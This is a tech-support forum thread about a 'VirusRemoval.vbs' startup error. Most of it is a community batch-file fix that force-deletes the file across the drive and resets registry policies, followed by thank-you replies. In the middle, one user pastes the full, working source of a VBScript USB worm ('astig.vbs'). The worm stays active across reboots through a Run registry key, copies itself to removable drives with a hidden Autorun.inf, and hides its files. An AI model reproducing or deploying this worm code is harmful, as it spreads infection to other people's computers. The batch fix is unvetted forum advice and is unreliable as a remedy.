Previous Topic Next Topic

Virus removal. vbs

Solved/Closed
Amal - Jun 16, 2008 at 03:42 AM
 Madm - May 29, 2013 at 05:51 PM
Hello,
WHen i restart my computer, i get an error message saying that "VirusRemoval.vbs" missing. How can i remove this one. Thank you.

Amal
Related:

10 responses

Answer 1 / 10
Sajal Shrestha
Jul 29, 2008 at 10:39 AM
just open your Notepad and type the below code and save it as sajal.bat and put it in your desktop and run it.
cd\
del /a /f /s VirusRemoval.vbs

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /f /d "%windir%\system32\userinit.exe",
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f /d "explorer.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v Hidden /f /d 00000002
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v ShowSuperHidden /f /d 00000001
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t Reg_dword /v SuperHidden /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v CheckedValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v CheckedValue /f /d 00000001
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /t Reg_dword /v DefaultValue /f /d 00000002
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v CheckedValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v DefaultValue /f /d 00000000
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden" /t Reg_dword /v UncheckedValue /f /d 00000001
reg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /t Reg_dword /v DisableMSI /f /d 0
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableCMD /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableConfig /f /d 0
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /t Reg_dword /v DisableSR /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_Binary /v NoDriveAutoRun /f /d ffffff03
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoDriveTypeAutoRun /f /d 36
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFolderOptions /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoRun /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /t Reg_dword /v NoFind /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\UnreadMail" /t Reg_dword /v MessageExpiryDays /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableTaskMgr /f /d 0
vinycool
Sep 20, 2008 at 03:41 AM
hi sajal this is veenit here i also face same problem of vbs script i tried your dat file but it shows error too command line prameters pls help me
gopal agarwal
Oct 26, 2008 at 02:20 AM
friend,
i was suffered from the virus removal.vbs for many days.
today i got the solution provided by u on yahoo group.and i did wat u directed it works but yet i am not confirmed that it works.anyways thanx very much.hope i can get more solutions from you.
simbadking
Dec 5, 2008 at 06:54 AM
Hi Sajal

Thanks dear for ur solution for removal.vbs , thnks i got rid of that problem
Rajeev
Dec 14, 2008 at 01:03 PM
Hi Sajal,

Iam really very very thankfull to you,bcoz i 2 got rid of this problem.Can i get your email-id.

Thanks,
Rajeev
Rinku Saini
Oct 10, 2009 at 10:05 PM
Thx Sajal,
yaar u r genius .ur .bat file trick 100% working for me.i was very need.Lagge raho munna bhai.........................
Answer 2 / 10
Amol
Sep 6, 2008 at 02:22 AM
Hi Sajal,

Thanks for your batch file.
I have used your batch file in my computer. I could remove "virus removal.vbs" error.


Regards,
Amol
Answer 3 / 10
Ash
Oct 1, 2008 at 03:06 AM
Hi Saja,

Perfect solution - THX.
Answer 4 / 10
rocking
Jan 28, 2009 at 05:02 PM
thanx buddy,
editting thru regedit helped...
thnx
Answer 5 / 10
gopal agarwalla
Dec 19, 2008 at 11:00 PM
thanx dear sir,i did wat u have guided me to remove the removal.vbs, and surprisingly i worked,thanx agaian.i will need ur valued help in future also,ur great social work via computer is highly be appriciated in all aspect,
yours
gopal agarwalla
Answer 6 / 10
Eng.Khaled
Apr 3, 2010 at 04:32 AM
Sajal has the best answer..thank you
Answer 7 / 10
wilhelm
Jul 16, 2010 at 08:58 AM
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax, pug, pou, kk, hh

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "astig.vbs" Then
wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\astig.vbs")

Set myFile = fso.CreateTextFile(win & "\astig.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\astig.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\astig.vbs"""

While (true)

Set myDrives = fso.Drives
For Each myFlashDrive In myDrives

If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=32
fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
End If

Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
auFile.write "[autorun]" & vbCrLf & "open=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Command=wscript.exe astig.vbs" & vbCrLf & "shell\Open\Default=1"
auFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
fAttr.Attributes=39

Set hh = fso.CreateTextFile(myFlashDrive.Path & "\ReadMeFirst.txt", true)
hh.write "[DeleteSolutionVirus]" & vbCrLf & "This program is a code of Solution Virus, but " & vbCrLf & "it delete a virus called Solution.vbs" & vbCrLf & "hope you like it folks!" & vbCrLf & "\m/ :-) myRules (-: \m/"
hh.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\ReadMeFirst.txt")
fAttr.Attributes=32

Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\astig.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(myFlashDrive.Path & "\astig.vbs")
fAttr.Attributes=39

End If

Next

With wscr
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\astigto", "wscript.exe """ & win & "\astig.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
End With

If fso.FileExists(myFlashDrive.Path & "\solution.vbs") Then
kk = fso.Deletefile(myFlashDrive.Path & "\solution.vbs")
End If

If tf <> win & "\astig.vbs" Then
If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
End If

WScript.Sleep 10000

Wend
Answer 8 / 10
wilhelm
Jul 16, 2010 at 08:59 AM
Hi to all please kindly give me the solution for this problem.. thanks you so much
Answer 9 / 10
Ambucias Posts 47311 Registration date Monday February 1, 2010 Status Moderator Last seen February 15, 2023 11,166
Jul 16, 2010 at 04:41 PM
Hello Wilhelm

The solution was already provided to you! Please use the batch file provided by another user in this thread which was a succesful solution.

Regards
Answer 10 / 10
rajesh
Apr 20, 2013 at 01:09 AM
Thanks its working

Similar discussions

Using attrib -h -r -s /s /d g:\*.* I could not wipe the attributes of my externa
jwtingley -
ac3mark -

1 response
Accessing Hidden Folders
rahulwa -
kieferschild -

10 responses
attrib -h -r -s /s /d g:\*.* did not work for me
johnmenard -
Ambucias -

1 response
uuuuuuuu.uuu SD card virus problem
pravin -
xpcman -

1 response